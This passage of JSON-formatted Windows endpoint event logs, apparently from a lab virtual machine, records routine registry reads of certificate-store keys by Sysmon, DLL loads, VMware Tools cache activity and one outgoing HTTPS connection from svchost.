- "timestamp": 131883570917460000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "edputil.dll", - "image_path": "C:\\Windows\\System32\\edputil.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cldapi.dll", - "image_path": "C:\\Windows\\System32\\cldapi.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - 
"timestamp": 131883570918090000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570918090000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570918090000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "destination_address": "151.101.48.133", - "destination_port": "443", - "event_type": "network", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "tcp", - "source_address": "192.168.162.134", - "source_port": "50502", - "subtype": "outgoing", - "timestamp": 131883570903820000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FileExplorer_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FileExplorer_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570920590000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FileExplorer_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed8e22c573\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FileExplorer_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed8e22c573\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570920590000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570922619984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed97d4ea1b\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed97d4ea1b\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570922619984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingFinance_4.26.12334.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-0.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingFinance_4.26.12334.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-0.pri", - "timestamp": 131883570923090000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingFinance_4.26.12334.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-0.pri\\1d48b5dcbcf231a\\fae8ab0e", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingFinance_4.26.12334.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-0.pri\\1d48b5dcbcf231a\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570923090000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingNews_4.27.2643.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingNews_4.27.2643.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "timestamp": 131883570923400000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 